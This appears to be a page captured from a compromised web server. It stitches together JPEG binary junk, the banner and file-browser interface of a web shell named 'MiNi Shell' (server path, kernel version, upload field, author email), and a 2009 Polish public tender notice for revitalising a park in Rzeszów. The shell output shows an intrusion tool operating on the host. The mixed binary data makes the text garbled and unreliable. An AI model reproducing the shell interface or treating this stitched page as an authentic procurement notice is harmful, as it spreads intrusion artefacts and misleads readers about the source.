JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/46179-N-2009.html

<p class="kh_header"><b>Rzeszów: Rewitalizacja Parku Jedności Polonii z Macierzą Część II w ramach zadania inwestycyjnego pn. Rewitalizacja Parku Jedności Polonii z Macierzą. Zadanie planowane do współfinansowania ze środków Unii Europejskiej.</b><br>
<b>Numer ogłoszenia: 46179 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Rzeszów - Miejski Zarząd Dróg i Zieleni w Rzeszowie , ul. Targowa 1, 35-064 Rzeszów, woj. podkarpackie, tel. 017 8627471 w. 241, faks 017 8526223.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nowy.erzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Parku Jedności Polonii z Macierzą Część II w ramach zadania inwestycyjnego pn. Rewitalizacja Parku Jedności Polonii z Macierzą. Zadanie planowane do współfinansowania ze środków Unii Europejskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie rewitalizacji Parku Jedności Polonii z Macierzą - Część II w ramach realizacji zadania inwestycyjnego pn. Rewitalizacja Parku Jedności Polonii z Macierzą. Zadanie planowane do współfinansowania ze środków Unii Europejskiej. Zakres robót : dotyczy tylko fragmentu parku oznaczonego na mapie - Etap II - realizacja w 2009 roku. 
Branże:
Drogowa :
- rozebranie nawierzchni z mieszanek mineralno-bitumicznych,
- rozebranie obrzeży trawnikowych,
- budowa obrzeży wzdłuż chodników oraz na łukach,
- wykonanie podbudowy o pełnej nowej konstrukcji,
- wykonanie nawierzchni z kostki brukowej betonowej,
- wykonanie schodów terenowych,
- wykonanie regulacji pionowej studzienek. 
Elektryczna :
- wykonanie przyłącza elektroenergetycznego dla pergoli,
- wykonanie przyłącza instalacji wewnętrznej fontanny,
- wykonanie przyłącza lini kablowej oświetlenia parkowego,
- montaż słupów oświetleniowych,
- montaż opraw,
- montaż projektorów.
Architektoniczna :
Rewitalizacja fontanny :
- rozebranie nawierzchni z kostki betonowej,
- ręczne rozebranie podbudowy betonowej o grubości 12cm,
- rozebranie ław, stóp i fundamentów,
- wykonanie konstrukcji żelbetowej fontanny,
- wykonanie izolacji,
- wykonanie okładzin kamiennych,
- budowa maszynowni fontanny,
- wykonanie technologii fontanny,
- budowa sieci i przyłączy wodno-kanalizacyjnych,
- budowa ławek ogrodowych przy fontannie.
Pergola:
- usunięcie warstwy ziemi urodzajnej,
- wykopy jamiste pod fundamenty,
- wykonanie konstrukcji żelbetowej pergoli,
- wykonanie konstrukcji drewnianej pergoli,
- wykonanie izolacji,
- wykonanie okładzin z płytek klinkierowych,
- wykonanie posadzki z płyt prostokątnych, granitowych,
- budowa ławek ogrodowych przy pergoli.
Zieleń:
- wycinka drzew kolidujących z pergolą, 
- nasadzenia roślin przy pergoli,
- nasadzenia roślin przy fontannie,
- nasadzenia roślin we wskazanych miejscach,
- formowanie skarp,
- zakładanie trawnika.
Szczegółowy zakres robót określa przedmiar robót i dokumentacja techniczna..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.23.31.61-5, 45.20.00.00-9, 45.31.61.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający wymaga wniesienia wadium w kwocie 36 900,00 zł, słownie: trzydzieści sześć tysięcy dziewięćset złotych 00/100.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca składający ofertę nie może być wykluczony z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz spełniać warunki określone w art. 22 ust. 1 ustawy,
2. doświadczenie zawodowe:
1) Wykonawca powinien wykazać, że w okresie ubiegłych pięciu lat przed wszczęciem postępowania (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie) zrealizował:
a) minimum dwa zadania polegające na ułożeniu nawierzchni z kostki brukowej betonowej - nie mniej niż 800 m2 każde zadanie,
b) minimum jedno zadanie polegające na budowie fontanny o wartości co najmniej 300 000,00 zł brutto,
c) minimum dwa zadania związane z budową linii kablowych nn i oświetlenia o wartości co najmniej 100 000,00 zł brutto każde zadanie,
d) minimum dwa zadania związane z budową sieci kanalizacyjnych o wartości co najmniej 50 000,00 zł brutto każde zadanie,
2) Wykonawca powinien wykazać, że w okresie ubiegłych trzech lat przed wszczęciem postępowania (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie) zrealizował usługę (usługi) polegającą (- ce) na nasadzeniu min. 500 szt. roślin (łącznie).
Doświadczenie Wykonawcy w zakresie, o którym mowa w ppkt 1-2  powinno zostać potwierdzone dokumentami, że prace powyższe zostały wykonane należycie.
3. potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel bezpo-średnio zatrudniony do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów o udostępnieniu osób zdolnych do wykonania zamówienia, tj.:
1) kierownik budowy: 
a) osoba z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej  do kierowania robotami budowlanymi bez ograniczeń lub odpowiadającymi im ważnymi uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowią-zujących przepisów, 
b) posiadający doświadczenie minimum 2 lata w pełnieniu funkcji kierownika budo-wy,
c) Wykonawca winien dołączyć do oferty opis doświadczenia zawodowego, w którym winien wykazać doświadczenie w realizacji na stanowisku kierownika budowy minimum dwóch zadań polegających na wykonaniu obiektów malej architektury, w szczególności budowy minimum jednej fontanny,
d) wymieniona osoba winna udokumentować aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
2) kierownik robót branży drogowej:
a) osoba z uprawnieniami budowlanymi w specjalności drogowej do kierowania ro-botami budowlanymi lub odpowiadającymi im ważnymi uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów,
b) doświadczenie minimum 2 lata licząc od dnia uzyskania uprawnień,
c) w opisie doświadczenia zawodowego wykazać się kierowaniem co najmniej dwo-ma zadaniami polegającymi na ułożeniu nawierzchni z kostki brukowej - nie mniej niż 800 m2 każde,
d) wymieniona osoba winna udokumentować aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
3) kierownik robót branży sanitarnej:
a) osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sie-ci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi lub odpowiadającymi im ważnymi uprawnieniami budowlanymi wydanymi na podstawie wcześniej obo-wiązujących przepisów,
b) posiadający doświadczenie minimum 2 lata licząc od dnia uzyskania uprawnień,
c) Wykonawca winien dołączyć do oferty opis doświadczenia zawodowego, w któ-rym winien wykazać doświadczenie w kierowaniu minimum dwoma zadaniami w branży sanitarnej (w zakresie sieci kanalizacyjnej),
d) wymieniona osoba winna udokumentować aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
4) kierownik robót branży elektrycznej:
a) osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sie-ci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania ro-botami budowlanymi lub odpowiadającymi im ważnymi uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów,
b) posiadający doświadczenie minimum 2 lata licząc od dnia uzyskania uprawnień,
c) Wykonawca winien dołączyć do oferty opis doświadczenia zawodowego, w któ-rym winien wykazać doświadczenie w kierowaniu minimum dwoma zadaniami w branży elektrycznej (w zakresie sieci ),
d) wymieniona osoba winna udokumentować aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
5) kierownik robót branży ogrodniczej:
a) posiadający doświadczenie minimum 2 lata  w nadzorowaniu prac związanych z zakładaniem terenów zieleni,
b) w opisie doświadczenia zawodowego winien wykazać się kierowaniem co naj-mniej jednym zadaniem polegającym na nasadzeniu minimum 500 szt. roślin,
4. potencjał techniczny:
Wykonawca musi dysponować narzędziami i urządzeniami niezbędnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń odpowiadających pod względem charakterystyki i ilości opisanym w SST, tj.:
1) koparko-ładowarka 0,25-0,6 m3 -1 szt. lub koparka 0,25-0,6 m3 i ładowarka - po 1 szt. 
2) koparko-spycharka na podw. ciągnika kołowego - 1 szt. 
3) samochody samowyładowcze 10-15 t w ilości 2 szt.
4) samochód dostawczy - 2 szt.
5) stopa wibracyjna - 1 szt. 
6)zagęszczarka płytowa - 1 szt. 
7) piła do cięcia betonu - 1 szt. 
8) sprężarka powietrzna przewoźna spalinowa 4-5 m3/min - 1 szt. 
9) beczka na wodę o pojemności min. 2500 litrów na kołach - 1 szt. 
10)ciągnik rolniczy o masie całkowitej do 1900 kg - 1 szt. 
11) przyczepa ciągnikowa o ładowności min. 3,5 t.  - 1 szt. 
12) zwyżka - 1 szt. 
13) przyczepa dłuż. do sam. - 1 szt. 
14) żuraw samochodowy 5-6t - 1 szt. 
5. Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę  min. 100 000,00 zł. 
Ocena spełniania powyższych warunków zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę metodą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 pkt. 1 ustawy Prawo zamówień publicznych na formularzu oświadczenia stanowiącym załącznik nr 2 do Instrukcji dla Wykonawcy,
3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferta
4) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt. 4 - 8 ustawy Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku, gdy Wykonawca jest osobą prawną, informacja winna dotyczyć aktualnych członków władz.
5) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6) oświadczenie wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 1 do Instrukcji dla Wykonawcy,
7) Wykaz wykonanych robót i usług zrealizowanych odpowiednio w okresie ubiegłych pięciu lub trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) odpowiadających swoim rodzajem i wartością robotom budowlanym i usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat wykonania i odbiorców wykonania - na załączniku nr 3 - wraz z dokumentami potwierdzającymi, że roboty te i usługi te zostały wykonane należycie,
8) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które  będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności na załączniku nr 4 - wraz z uprawnieniami budowlanymi, opisami doświadczenia zawodowego oraz dokumentami potwierdzającymi aktualne członkostwo tych osób w OIIB,
9) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca na załączniku nr 5,
10) Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
11) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 8, Wykonawca wskazał osoby, którymi będzie dysponował,
12) Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 9 Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował, 
2. Ponadto do oferty należy dołączyć:
1) pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonania których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem,
2) pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem,
3) dane dotyczące zakresu powierzonych podwykonawcom części zamówienia na załączniku nr 6, 
4) Dowód wniesienia wadium. W przypadku, gdy Wykonawca wniesie wadium w pieniądzu winien dołączyć do oferty kopię dowodu wpłaty na rachunek Zamawiającego potwierdzoną za zgodność z oryginałem. Wadium w pozostałych formach wpłaty należy w formie oryginału złożyć w siedzibie Zamawiającego (pok. 601, VI piętro), a do oferty załączyć kopię potwierdzoną za zgodność z oryginałem przez upoważnionego przedstawiciela Wykonawcy.
5) Tabelę elementów rozliczeniowych.
DOKUMENTY POTWIERDZJĄCE SPEŁNIANIE WARUNKÓW UDZIALU W POSTĘPOWNAIU WYKONAWCÓW MAJACYCH SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA ZA GRANICĄ:
1. Gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt III ppkt 1, 3,4,5) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony niewcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa wyżej zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nowy.erzeszow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Zieleni, Rzeszów, ul. Targowa 3, pok. 320.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 09:45, miejsce: Miejski Zarząd Dróg i Zieleni, Rzeszów, ul. Targowa 1, pok. 601.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com